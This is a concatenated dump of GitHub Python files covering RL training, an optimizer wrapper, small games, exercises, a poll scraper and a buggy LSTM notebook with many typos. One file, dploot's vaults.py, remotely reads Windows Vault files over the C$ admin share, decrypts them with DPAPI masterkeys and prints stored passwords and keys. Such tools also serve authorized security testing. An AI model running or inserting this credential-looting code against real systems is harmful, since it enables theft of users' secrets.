logging.getLogger()\n\nFILE_PATTERN = re.compile(r'.*(?P<eid>h\\d+)_(?P<tuid>.*)_(?P<ln>\\D*)_(?P<fn>\\D*).csv')\n\n\nclass Rubric:\n\n def __init__(self, file: str):\n self.__init_information(file)\n self.__init_csv(file)\n\n def __init_csv(self, file: str):\n try:\n self.__frame = pandas.read_csv(file, header=1, index_col='Kriterium')\n self.points = self.__frame.loc['Gesamt', 'Erzielt']\n except Exception as e:\n raise Exception(\"<{file}> could not be read.\")\n\n def __init_information(self, file_name: str, warn: bool = True) -> None:\n \"\"\"\n Sets the exercise id, the tu id, the last name and the first name given by the file name.\n :type warn: if a warning should be printed if the file name does not match the expected pattern\n :param file_name: the file name\n \"\"\"\n self.exercise_id = self.tu_id = self.last_name = self.first_name = None\n match = FILE_PATTERN.match(file_name)\n if not match:\n if warn:\n LOGGER.warning(\"<{file}> does not match name pattern.\".format(file=file_name))\n return\n self.exercise_id = match['eid']\n self.tu_id = match['tuid']\n self.last_name = match['ln']\n self.first_name = match['fn']\n\n @property\n def full_name(self) -> str:\n return '{fn} {ln}'.format(fn=self.first_name, ln=self.last_name)\n\n def file_name(self, data_format: str = 'json') -> str:\n return f'{self.exercise_id}_{self.tu_id}_{self.last_name}_{self.first_name}.{data_format}'\n\n def __str__(self):\n return '{0}'.format(self.exercise_id)\n","repo_name":"dst97/BUtils","sub_path":"butils/rubrics.py","file_name":"rubrics.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74436958199","text":"from ActorCritic import CPVer, CartPoleActorCritic\nimport tqdm\nimport statistics\nfrom collections import deque\nimport tensorflow as tf\nfrom matplotlib import pyplot as plt\n\nif __name__ == '__main__':\n num_actions = 2 # env.action_space.n\n num_hidden_units = 128\n\n ai = CartPoleActorCritic(num_actions, num_hidden_units, CPVer.V0)\n # Training goals\n min_episodes = 100\n max_episodes = 1000\n\n # Cartpole V0 is terminated after up to 200 steps, V1 after 500\n max_steps_per_episode = 200\n\n # Cartpole-v0 is considered solved if average reward is >= 195 over 100 consecutive trials\n # Cartpole-v0 is considered solved if average reward is >= 475 over 100 consecutive trials\n reward_threshold = 195\n\n # Discount factor for future rewards\n gamma = 0.99\n\n # Keep last episodes reward\n episodes_reward = deque(maxlen=min_episodes)\n\n # Reward array for statistic\n rewards = []\n episodes = []\n rendered = []\n with tqdm.tqdm(range(max_episodes)) as t:\n for i in t:\n episode_reward = int(ai.train_step(gamma, max_steps_per_episode))\n episodes_reward.append(episode_reward)\n\n running_reward = statistics.mean(episodes_reward)\n rewards.append(running_reward)\n episodes.append(episode_reward)\n\n t.set_description(f'Episode {i}')\n t.set_postfix(episode_reward=episode_reward,\n running_reward=running_reward)\n\n # If True we got it!\n if running_reward > reward_threshold and i >= min_episodes:\n ai.save_model('model.pickle')\n break\n \n plt.plot(rewards)\n plt.show()\n\n plt.plot(episodes)\n plt.show()\n\n\n # ai.load_model('model.pickle')\n rendered[0].save(str('game.gif'), save_all=True,\n append_images=rendered, loop=0, duration=20)\n\n # ai.render_episode(max_steps_per_episode, sleep_sec=0.0025)\n # ai.episode_into_gif('game.gif')\n","repo_name":"adriankucharski/pole-cart-rl","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"14393198244","text":"import logging\nimport ntpath\nfrom typing import Any, List\nfrom binascii import hexlify\n\nfrom impacket.structure import hexdump\nfrom impacket.dcerpc.v5.dtypes import RPC_SID\nfrom impacket.dpapi import VAULT_INTERNET_EXPLORER, VAULT_WIN_BIO_KEY, VAULT_NGC_ACCOOUNT\n\nfrom dploot.lib.dpapi import decrypt_vcrd, decrypt_vpol, find_masterkey_for_vpol_blob\nfrom dploot.lib.smb import DPLootSMBConnection\nfrom dploot.lib.target import Target\nfrom dploot.lib.utils import is_guid\nfrom dploot.triage.masterkeys import Masterkey\n\nclass VaultCred:\n def __init__(self, winuser, blob, type: \"VAULT_INTERNET_EXPLORER|VAULT_WIN_BIO_KEY|VAULT_NGC_ACCOOUNT| Any\", username: str = None, resource: str = None, password: str = None, sid: str = None, friendly_name: str = None, biometric_key: str = None, unlock_key: str = None, IV: str = None, cipher_text: str = None):\n self.blob = blob\n self.winuser = winuser\n if type is VAULT_INTERNET_EXPLORER:\n self.type = 'Internet Explorer'\n self.username = username\n self.resource = resource\n self.password = password\n elif type is VAULT_WIN_BIO_KEY:\n self.type = 'WINDOWS BIOMETRIC KEY'\n self.sid = sid\n self.friendly_name = friendly_name\n self.biometric_key = biometric_key\n elif type is VAULT_NGC_ACCOOUNT:\n self.type = 'NGC LOCAL ACCOOUNT'\n self.sid = sid\n self.friendly_name = friendly_name\n self.unlock_key = unlock_key\n self.IV = IV\n self.cipher_text = cipher_text\n else:\n self.type = 'None'\n \n def dump(self) -> None:\n self.blob.dump()\n if self.password is not None:\n print('Decoded Password: %s' % self.password)\n print()\n\n def dump_quiet(self) -> None:\n if self.type == 'Internet Explorer':\n print(\"[Internet Explorer] %s - %s:%s\" % (self.resource, self.username, self.password))\n\nclass VaultsTriage:\n\n false_positive = ['.','..', 'desktop.ini','Public','Default','Default User','All Users']\n user_vault_generic_path = [\n 'Users\\\\%s\\\\AppData\\\\Local\\\\Microsoft\\\\Vault',\n 'Users\\\\%s\\\\AppData\\\\Roaming\\\\Microsoft\\\\Vault',\n ]\n system_vault_generic_path = [\n \"Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\",\n \"Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Vault\",\n \"Windows\\\\ServiceProfiles\\\\LocalService\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\",\n \"Windows\\\\ServiceProfiles\\\\LocalService\\\\AppData\\\\Roaming\\\\Microsoft\\\\Vault\",\n \"Windows\\\\ServiceProfiles\\\\NetworkService\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\",\n \"Windows\\\\ServiceProfiles\\\\NetworkService\\\\AppData\\\\Roaming\\\\Microsoft\\\\Vault\"\n ]\n share = 'C$'\n vpol_filename = 'Policy.vpol'\n\n def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: List[Masterkey]) -> None:\n self.target = target\n self.conn = conn\n \n self._users = None\n self.looted_files = dict()\n self.masterkeys = masterkeys\n\n def triage_system_vaults(self) -> List[VaultCred]:\n vaults_creds = list()\n vault_dirs = self.conn.listDirs(self.share, self.system_vault_generic_path)\n for system_vault_path,system_vault_dir in vault_dirs.items():\n if system_vault_dir is not None:\n vaults_creds += self.triage_vaults_folder(user = 'SYSTEM', vaults_folder_path=system_vault_path,vaults_folder=system_vault_dir)\n return vaults_creds\n\n def triage_vaults(self) -> List[VaultCred]:\n vaults_creds = list()\n for user in self.users:\n try:\n vaults_creds += self.triage_vaults_for_user(user) \n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.debug(str(e))\n pass\n return vaults_creds\n\n def triage_vaults_for_user(self, user:str) -> List[VaultCred]:\n vaults_creds = list()\n vault_dirs = self.conn.listDirs(self.share, [elem % user for elem in self.user_vault_generic_path])\n for user_vault_path,user_vault_dir in vault_dirs.items():\n if user_vault_dir is not None:\n vaults_creds += self.triage_vaults_folder(user=user, vaults_folder_path=user_vault_path,vaults_folder=user_vault_dir)\n return vaults_creds\n\n def triage_vaults_folder(self, user, vaults_folder_path, vaults_folder) -> List[VaultCred]:\n vaults_creds = list()\n for d in vaults_folder:\n if is_guid(d.get_longname()) and d.is_directory()>0:\n vault_dirname = d.get_longname()\n vault_directory_path = ntpath.join(vaults_folder_path,vault_dirname)\n logging.debug(\"Found Vault Directory: \\\\\\\\%s\\\\%s\\\\%s\\n\" % (self.target.address,self.share,vault_directory_path))\n \n # read vpol blob\n vpol_filepath = ntpath.join(vault_directory_path,self.vpol_filename)\n vpolblob_bytes = self.conn.readFile(self.share,vpol_filepath)\n vpol_keys = list()\n if vpolblob_bytes is not None and self.masterkeys is not None:\n self.looted_files[vault_dirname + '_' + self.vpol_filename] = vpolblob_bytes \n masterkey = find_masterkey_for_vpol_blob(vpolblob_bytes, self.masterkeys)\n if masterkey is not None:\n vpol_decrypted = decrypt_vpol(vpolblob_bytes,masterkey)\n if vpol_decrypted['Key1']['Size'] > 0x24:\n vpol_keys.append(\n hexlify(vpol_decrypted['Key2']['bKeyBlob']))\n vpol_keys.append(\n hexlify(vpol_decrypted['Key1']['bKeyBlob']))\n else:\n vpol_keys.append(\n hexlify(\n vpol_decrypted['Key2']['bKeyBlob']['bKey']).decode('latin-1'))\n vpol_keys.append(\n hexlify(\n vpol_decrypted['Key1']['bKeyBlob']['bKey']).decode('latin-1'))\n else:\n logging.debug(\"Could not decrypt...\")\n\n # read vrcd blob\n vault_dir = self.conn.remote_list_dir(self.share, vault_directory_path)\n for file in vault_dir:\n filename = file.get_longname()\n if filename != self.vpol_filename and filename not in self.false_positive and file.is_directory() == 0 and filename[-4:] == 'vcrd':\n vrcd_filepath = ntpath.join(vault_directory_path,filename)\n vrcd_bytes = self.conn.readFile(self.share, vrcd_filepath)\n self.looted_files[vault_dirname + '_' + vrcd_filepath] = vpolblob_bytes \n if vrcd_bytes is not None and filename[-4:] in ['vsch','vcrd'] and len(vpol_keys) > 0:\n vault = decrypt_vcrd(vrcd_bytes, vpol_keys)\n if isinstance(vault, (VAULT_INTERNET_EXPLORER, VAULT_WIN_BIO_KEY, VAULT_NGC_ACCOOUNT)):\n if isinstance(vault, VAULT_INTERNET_EXPLORER):\n vaults_creds.append(VaultCred(winuser=user, blob=vault, type=type(vault), username=vault['Username'].decode('utf-16le'),resource=vault['Resource'].decode('utf-16le'), password=vault['Password'].decode('utf-16le') ))\n elif isinstance(vault, VAULT_WIN_BIO_KEY):\n vaults_creds.append(VaultCred(winuser=user, blob=vault, type=type(vault), sid=RPC_SID(b'\\x05\\x00\\x00\\x00'+vault['Sid']).formatCanonical(), friendly_name=vault['Name'].decode('utf-16le'), biometric_key=(hexlify(vault['BioKey']['bKey'])).decode('latin-1')))\n elif isinstance(vault, VAULT_NGC_ACCOOUNT):\n vaults_creds.append(VaultCred(winuser=user, blob=vault, type=type(vault), sid=RPC_SID(b'\\x05\\x00\\x00\\x00'+vault['Sid']).formatCanonical(), friendly_name=vault['Name'].decode('utf-16le'), biometric_key=(hexlify(vault['BioKey']['bKey'])).decode('latin-1'), unlock_key=hexlify(vault[\"UnlockKey\"]), IV=hexlify(vault[\"IV\"]), cipher_text=hexlify(vault[\"CipherText\"])))\n else:\n logging.debug('Vault decrypted but unknown data structure:')\n return vaults_creds\n\n @property\n def users(self) -> List[str]:\n if self._users is not None:\n return self._users\n \n users = list()\n\n users_dir_path = 'Users\\\\*'\n directories = self.conn.listPath(shareName=self.share, path=ntpath.normpath(users_dir_path))\n for d in directories:\n if d.get_longname() not in self.false_positive and d.is_directory() > 0:\n users.append(d.get_longname())\n \n self._users = users\n\n return self._users","repo_name":"zblurx/dploot","sub_path":"dploot/triage/vaults.py","file_name":"vaults.py","file_ext":"py","file_size_in_byte":9218,"program_lang":"python","lang":"en","doc_type":"code","stars":312,"dataset":"github-code","pt":"40"} +{"seq_id":"5398685750","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\nimport time\nimport warnings\nimport numpy as np\nfrom numpy import newaxis\nfrom keras.layers.core import Dense, Activation, Dropout\nfrom keras.layers.recurrent import LSTM\nfrom keras.models import Sequential\n\n\n# In[3]:\n\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nwarnings.filterwarnings(\"ignore\")\n\n\n# In[4]:\n\n\ndef load_data(filename, seq_len, normalise_window):\n f = open(filename, 'rb').read()\n data = f.decode().split('\\n')\n \n sequence_length = seq_len + 1\n result = []\n for index in range(len(data) - sequence_length):\n result.append(data[index: index + sequence_length])\n \n if normalise_window:\n result = normalise_window(result)\n \n result = np.array(result)\n \n row = round(0.9 * result.shape[0])\n train = result[:int(row),:]\n np.random.shuffle(train)\n x_train = train[:,:-1]\n y_train = train[: -1]\n x_test = result[int(row):, :-1]\n y_test = result[int(row):, -1]\n \n x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\n x_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], 1))\n \n return [x_train, y_train, x_test, y_test]\n\n\n# In[5]:\n\n\ndef normalise_windows(window_data):\n normalised_data = []\n for window in window_data:\n normalised_window = [((float(p) / float(window[0])) - 1) for p in window]\n normalise_data.append(normalised_window)\n return normalised_data\n\n\n# In[6]:\n\n\ndef build_model(layers):\n model = Sequential()\n \n model.add(LSTM(input_shape = (layers[1], layers[0]),\n output_dim = layers[1],\n return_sequences=True))\n model.add(Dropout(0.2))\n \n model.add(LSTM(layers[2], return_sequences=False))\n model.add(Dropout(0.2))\n \n model.add(Dense(output_dim = layer[3]))\n model.add(Activation(\"Linear\"))\n \n start = time.time()\n mdoel.compile(loss=\"mse\", optimizer = 'rmprop')\n print(\"実行時間: \", time.time() - start)\n return model\n\n\n# In[7]:\n\n\ndef predict_point_by_point(model, data):\n predicted = model.predict(data)\n predicted = no.reshape(predicted, (predicted.size,))\n return predicted\n\n\n# In[8]:\n\n\ndef predict_sequence_full(model, data, window_size):\n curr_frame = daa[0]\n predicted = []\n for i in range(len(data)):\n predicted.append(model.predict(curr_frame[newaxis,:,:])[0,0])\n curr_frame = curr_frame[1:]\n curr_frame = np.insert(curr_frame, [window_size-1], predicted[-1], axis=0)\n return predicted\n\n\n# In[9]:\n\n\ndef predict_sequences_multipule(model, data, window_size, prediction_len):\n prediction_len = []\n for i in range(len(data)/prediction_len):\n curr_frame = data[i*prediction_len]\n predicted = []\n for j in xrange(prediction_len):\n predicted.append(model.predict(curr_frame[newaxis, :, :][0,0]))\n curr_frame = curr_frame[1:]\n curr_frame = np.insert(curr_frame, [window_size-1], predicted[-1], axis=0)\n prediction_seqs.append(predicted)\n return prediction_seqs\n\n\n# In[12]:\n\n\n#import subprocess\n#subprocess.run(['jupyter', 'nbconvert', '--to', 'python', 'ファイル名.ipynb'])\n\n","repo_name":"DoChi72/jupyter_notebooks","sub_path":"intern_works/RNN_machinelerning_study/sandp_lstm/lstm_writed.py","file_name":"lstm_writed.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36086216425","text":"import torch\nfrom kospeech.optim.adamp import AdamP\nfrom kospeech.optim.radam import RAdam\nfrom kospeech.optim.novograd import Novograd\n\n\nclass Optimizer(object):\n \"\"\"\n This is wrapper classs of torch.optim.Optimizer.\n This class provides functionalities for learning rate scheduling and gradient norm clipping.\n\n Args:\n optim (torch.optim.Optimizer): optimizer object, the parameters to be optimized\n should be given when instantiating the object, e.g. torch.optim.Adam, torch.optim.SGD\n scheduler (kospeech.optim.lr_scheduler, optional): learning rate scheduler\n scheduler_period (int, optional): timestep with learning rate scheduler\n max_grad_norm (int, optional): value used for gradient norm clipping\n \"\"\"\n def __init__(self, optim, scheduler=None, scheduler_period=None, max_grad_norm=0):\n self.optimizer = optim\n self.scheduler = scheduler\n self.scheduler_period = scheduler_period\n self.max_grad_norm = max_grad_norm\n self.count = 0\n\n def step(self, model):\n if self.max_grad_norm > 0:\n torch.nn.utils.clip_grad_norm_(model.parameters(), self.max_grad_norm)\n self.optimizer.step()\n\n if self.scheduler is not None:\n self.update()\n self.count += 1\n\n if self.scheduler_period == self.count:\n self.scheduler = None\n self.scheduler_period = 0\n self.count = 0\n\n def set_scheduler(self, scheduler, scheduler_period):\n self.scheduler = scheduler\n self.scheduler_period = scheduler_period\n self.count = 0\n\n def update(self):\n if isinstance(self.scheduler, torch.optim.lr_scheduler.ReduceLROnPlateau):\n pass\n else:\n self.scheduler.step()\n\n def zero_grad(self):\n self.optimizer.zero_grad()\n\n def get_lr(self):\n for g in self.optimizer.param_groups:\n return g['lr']\n\n def set_lr(self, lr):\n for g in self.optimizer.param_groups:\n g['lr'] = lr\n","repo_name":"sooftware/kospeech","sub_path":"kospeech/optim/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":540,"dataset":"github-code","pt":"40"} +{"seq_id":"38004595389","text":"import random\r\nfrom art import logo\r\nfrom replit import clear\r\ncards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\r\nstart=input(\"Do you want to paly blackjack.\\nType y to play and n to stop\").lower()\r\nif start == 'y':\r\n end = False\r\nelif start == 'n':\r\n end = True\r\n clear()\r\nelse:\r\n print(\"Invalid input !!!\") \r\n\r\nwhile not end:\r\n user=[]\r\n computer=[]\r\n for i in range(2):\r\n user.append(random.choice(cards))\r\n computer.append(random.choice(cards))\r\n sum1=sum(user)\r\n sum2=sum(computer)\r\n print(f\"Your cards are {user} which totals : {sum1}\\nComputer one card is {computer[random.randint(0,1)]}\")\r\n draw_card = False \r\n while not draw_card:\r\n choice=input(\"Do you want to draw another card\").lower()\r\n if choice == 'y':\r\n another_card = random.choice(cards)\r\n if another_card == 11:\r\n x=sum1 + another_card\r\n if x > 21:\r\n another_card = 1\r\n else:\r\n another_card = 11\r\n user.append(another_card)\r\n sum1_2 = sum(user)\r\n sum1 = sum1_2\r\n print(f\"Another card is {another_card} which totals to : {sum1}\")\r\n else:\r\n draw_card = True\r\n if sum1 > sum2 and sum1 <= 21 :\r\n print(f\"Computer cards are {computer} which totals to {sum2}\")\r\n print(\"You win\")\r\n elif sum1 > 21 or sum1 < sum2:\r\n print(f\"Computer cards are {computer} which totals to {sum2}\")\r\n print(\"You loose\")\r\n start_again=input(\"Do you want to play again\\nType 'y' for yes and 'n' for no\").lower()\r\n if start_again == 'y':\r\n clear()\r\n else:\r\n end = True","repo_name":"SudeepNadgambe/cv","sub_path":"blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23280912512","text":"\"\"\"\n# author: chenyi\n# ide: notepad++\n# date: 16:46 2022年11月28日\n# version: 1.0.0\n# 闹钟程序,定时播放MP3\n\"\"\"\nimport multiprocessing\n# play mp3 module\nfrom playsound import playsound\nimport time\n# 多线程模块\nimport _thread\n\nMP3 = r'F:\\mp3\\yesterday once more.mp3' # 全局变量地址\n\n# 获得本机时间函数\ndef showTime():\n \"\"\"显示时间\"\"\" \n t = time.localtime() # 实例化本机时间\n global get_hour, get_minute, get_second \n get_hour = t.tm_hour # 获得本机小时时间\n get_minute = t.tm_min # 获得本机分钟时间\n get_second = t.tm_sec # 获得本机秒种时间\n return '%02d:%02d:%02d' %(get_hour, get_minute, get_second)\n\n\n# 播放函数\ndef playMp3(playLen = 180):\n # 播放MP3\n # 创建进程对象\n p = multiprocessing.Process(target=playsound, args=(MP3,))\n p.start() # 开始播放 mp3\n stopTime= playLen # 播放音乐时间长度/秒\n # 开始播放倒计时\n while stopTime:\n time.sleep(1)\n stopTime -= 1 \n p.terminate() # 时间到 mp3 就停止播放\n\n\n# 监控时间函数\ndef monitorTime(h, m, s=0):\n setClockHour = h\n setClockMin = m\n setClocksecond = s\n # 监控时间,时间到就调用播放 playMp3() 函数\n if get_hour == setClockHour and get_minute == setClockMin and get_second==setClocksecond:\n print('%02d:%02d:%02d,clock 1, start mp3' %(get_hour, get_minute, get_second))\n # playMp3() # 调用播放函数\n _thread.start_new_thread( playMp3, (180,) ) # 多线程调用 playmp3 函数\n elif setClockHour == -1 and get_minute == setClockMin and get_second==setClocksecond: # 每个小时的第 setClockMin 分种运行一次 playMp3 函数\n print('>>>%2d:%02d,clock minute, start mp3' %( get_minute, get_second))\n _thread.start_new_thread( playMp3, (120,) ) # 多线程调用 playmp3 函数\n elif setClockHour == -1 and setClockMin == -1 and get_second==setClocksecond: # 每分钟的 setClocksecond 秒时间点运行 playMp3 函数\n print('>>>%02d,clock second, start mp3' %(get_second))\n _thread.start_new_thread( playMp3, (15,) ) # 多线程调用 playmp3 函数\n \n \"\"\"\n # 本函数的参数使用方法 \n monitorTime(12,30,30) # 12:30:30 每天的12:30:30开始闹钟 \n monitorTime(-1,30,30) # -1,30,0 每小时的30分:30秒开始闹钟 \n monitorTime(-1,-1,30) # -1,-1,30 每分钟的第30秒开始闹钟 \n monitorTime(-1,-1,-1) # -1,-1,-1 取消闹钟该时间段的闹钟 \n \"\"\"\n \nif __name__ == '__main__':\n # 用二维列表的数据结构设置闹钟的时间 [时, 分, 秒]\n # setColock = [[13, 15, 0], [14, 30, 0], [-1, -1, 1], [-1, -1, 20], [-1, -1, 40]] \n setColock = [[13, 15, 0], [14, 30, 0], [-1, 57, 1], [-1, -1, -1], [-1, -1, -1]] \n # setColock = [[-1, -1, 'd']] # 也可以单独设置一维数组\n while True:\n print(showTime())\n time.sleep(1)\n # showTime()\n for i in setColock: #遍历列表使 monitorTime 函数获得参数\n monitorTime(i[0], i[1], i[2])\n","repo_name":"sssschenyi/tools","sub_path":"2play_mp3.py","file_name":"2play_mp3.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"12622277166","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n.. currentmodule:: tasks\n.. moduleauthor:: Pat Daburu <pat@daburu.net>\n\nProvide a brief description of the module.\n\"\"\"\n\nfrom luigi.contrib.postgres import PostgresTarget\nfrom .environment import PgEnvironment\nfrom ...tasks import Task\n\n\ndef pg_info(env: str, table: str, update_id: str):\n \"\"\"\n Use this decorator to indicate the PostGIS Environment that will be used by this task.\n :param env: the PostGIS environment key\n :param update_id: and identifier for the data set\n \"\"\"\n def set_pg_info(cls):\n # Set the flag that tells us we actually have some info supplied by the decorator.\n cls._pg_info = True\n # Set the PostGIS environment key.\n cls._pgenv_key = env\n # Set the update ID.\n cls._target_update_id = update_id\n # Set the target table.\n cls._target_table\n return cls\n return set_pg_info()\n\n\nclass PgTaskMixin(object):\n _pg_info: bool = False #: Does the task have PostGIS information applied to it?\n _pgenv_key: str = 'default' #: the environment key\n _target_table: str = None\n _target_update_id: str = None #: the update ID for the Postgres target\n\n def __init__(self):\n # If no PostGIS information has been supplied...\n if not self._pg_info:\n raise TypeError('No PostGIS information has been supplied for this task.')\n # If PostGIS information has been supplied...\n if self._pg_info:\n # ...let's get set up.\n self._pgenv = PgEnvironment.instance(self._pgenv_key)\n self._pg_target = PostgresTarget(host=self._pgenv.host,\n database=self._pgenv.database,\n user=self._pgenv.user,\n password=self._pgenv.password,\n table=self._target_table,\n update_id=self._target_update_id)\n\n\nclass PgTask(Task, PgTaskMixin):\n def __init__(self):\n Task.__init__(self)\n PgTaskMixin.__init__(self)\n\n\n\n","repo_name":"patdaburu/rdrnr","sub_path":"rdrnr/db/postgis/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26540479667","text":"def reverse(x: int):\n if x == 0:\n return 0\n \n tempStr = str(abs(x))\n answer = 0\n \n xList = list(tempStr)\n xList.reverse()\n \n while xList[0] == '0':\n del xList[0]\n \n if x < 0:\n answer = int('-' + ''.join(xList))\n if answer < -2**31:\n return 0\n return answer\n elif x > 0:\n answer = int(''.join(xList))\n if answer > 2**31-1:\n return 0\n return answer\n else:\n return 0\n \ntemp = '-021'\nprint(int(temp))","repo_name":"kkkapuq/AlgorithmStudy","sub_path":"Python/220815_Leetcode_7. Reverse Integer/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9910229860","text":"# question1.py\n# prints out list in the order that the user entered it but without duplicates\n# camilla craven\n# 28 april 2014\n\n\nstring = input(\"Enter strings (end with DONE):\\n\")\n\nList = []\n\nwhile string != \"DONE\": # creating sentinel loop (will end when user enters \"DONE\")\n \n # to avoid duplicates, only add string not already in list \n if string not in List:\n List.append(string) \n \n # if string already in list, it is not added\n else: \n None\n \n string = input() # prompts user for more strings\n \n \nprint()\nprint(\"Unique list:\")\n\n# print every string in list (in order)\nfor i in List:\n print(i)\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_7/crvcam001/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8257961984","text":"class ComplexLinkedListNode(object):\n def __init__(self, value=None, next=None, sibling=None):\n self.value = value\n self.next = next\n self.sibling = sibling\n\n def __str__(self):\n return str(self.value)\n\n\nclass LinkedList(object):\n def __init__(self, header=None):\n self.header = header\n\n\ndef clone_nodes(head):\n if not isinstance(head, ComplexLinkedListNode):\n raise TypeError\n\n node = head\n while node is not None:\n clone_node = ComplexLinkedListNode(node.value)\n clone_node.next = node.next\n node.next = clone_node\n node = clone_node.next\n\n\ndef clone_sibling(head):\n node = head\n while node is not None:\n clone_node = node.next\n if node.sibling is not None:\n clone_node.sibling = node.sibling.next\n node = clone_node.next\n\n\ndef split_linkedList(head):\n clone_head = head.next\n node = head\n clone_node = clone_head\n while node is not None:\n node.next = clone_node.next\n node = node.next\n if node is not None:\n clone_node.next = node.next\n clone_node = clone_node.next\n return clone_head\n\n\n# time O(n)\ndef complex_linkedList_clone(head):\n # step one, clone every node\n clone_nodes(head)\n # step two, set sibling\n clone_sibling(head)\n # step three, split linkedList\n clone_head = split_linkedList(head)\n return clone_head\n\n\ndef test():\n a = ComplexLinkedListNode('a')\n b = ComplexLinkedListNode('b')\n c = ComplexLinkedListNode('c')\n d = ComplexLinkedListNode('d')\n e = ComplexLinkedListNode('e')\n a.next = b\n b.next = c\n c.next = d\n d.next = e\n a.sibling = c\n b.sibling = e\n d.sibling = b\n linked_list = LinkedList(a)\n head = linked_list.header\n print('raw', id(head.sibling), head.sibling)\n print('raw', id(head.next.sibling), head.next.sibling)\n # while head is not None:\n # print(head)\n # head = head.next\n clone_head = complex_linkedList_clone(linked_list.header)\n print('sibling', id(clone_head.sibling), clone_head.sibling)\n print('sibling', id(clone_head.next.sibling), clone_head.next.sibling)\n while clone_head is not None:\n print(clone_head)\n clone_head =clone_head.next\n\n\nif __name__ == '__main__':\n test()","repo_name":"realRichard/-offer","sub_path":"chapterFour/breakDown/complexLinkedListClone/1.3.py","file_name":"1.3.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17868417318","text":"from bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\nimport numpy as np\nimport sqlite3\nimport enum\n\n#Collects the html from the source page\ndef getHTML(link):\n source = requests.get(link).text\n soup = BeautifulSoup(source,'lxml')\n return soup\n\n#Collects the table from ukpollingreport for polls before 2020\ndef getPre2020Table(soup):\n table = soup.find('div', class_='polltable').find('table')\n return table\n\n#Formats the dates of each poll\ndef parseDate(date,year):\n dateLib = {'Jan':'1','Feb':'2','Mar':'3','Apr':'4','May':'5','Jun':'6','Jul':'7','Aug':'8','Sep':'9','Oct':'10','Nov':'11','Dec':'12'}\n dateString = str(year) + '-' + dateLib[date[-3:]] +'-'\n dateList = date.split(' ')\n if len(dateList[-2]) < 3:\n dateString += dateList[-2]\n elif dateList[-2][-2] == '–':\n dateString += dateList[-2][-1]\n elif dateList[-2][-3] == '–':\n dateString += dateList[-2][-2:]\n return dateString\n\n#Puts the ukpollingreport polls into an array\ndef pre2020TableToArray(table):\n rows = table.find_all('tr')\n headers = rows[0].find_all('td')\n array = []\n\n for header in range(len(headers)):\n headers[header] = headers[header].text.replace('\\n', '')\n rows.pop(0)\n\n for row in rows:\n data = row.find_all('td')\n if len(data) == len(headers):\n blank = 0\n for datum in range(len(data)):\n data[datum] = data[datum].text.replace('\\n', '')\n if datum in [2,3,4,6] and len(data[datum].strip()) == 0:\n blank += 1\n if data[1].strip()[:4] != '2020' and blank == 0: #updated to not include from 2020 or any where data is missing for a party\n array.append(data)\n return array\n\n#Turns the array into a pandas dataframe\ndef pre2020PollsToDF():\n soup = getHTML('http://ukpollingreport.co.uk/voting-intention-2')\n table = getPre2020Table(soup)\n data = pre2020TableToArray(table)\n df = pd.DataFrame(data,columns=['pollster','date','con','lab','libdem','ukip','green','con lead'])\n df = df.drop(['ukip', 'con lead'],axis=1)\n return df\n\n#Gets either the 2020 or 2021 poll table from wikipedia\ndef getNewTable(soup,index):\n tables = soup.find_all('table', class_='wikitable sortable mw-datatable')\n table = tables[index].tbody()\n return table\n\n#Turns the 2020/2021 table into an array\ndef newTableToArray(rows,index):\n headers = rows[0].find_all('th')\n array = []\n\n for header in range(len(headers)):\n headers[header] = headers[header].text.replace('\\n', '')\n rows.pop(0)\n\n for row in rows:\n data = row.find_all('td')\n if len(data) == len(headers):\n for datum in range(len(data)):\n if datum == 2:\n data[datum] = parseDate(data[datum].text.replace('\\n',''),2021-index)\n else:\n data[datum] = data[datum].text.replace('\\n', '').replace('%','')\n array.append(data)\n return array\n\n#Converts the array to a dataframe\ndef newPollsToDF(index):\n soup = getHTML('https://en.wikipedia.org/wiki/Opinion_polling_for_the_next_United_Kingdom_general_election')\n table = getNewTable(soup,index)\n data = newTableToArray(table,index)\n df = pd.DataFrame(data,columns=['pollster','client','date','area','samplesize','con','lab','libdem','snp','green','others','lead'])\n df = 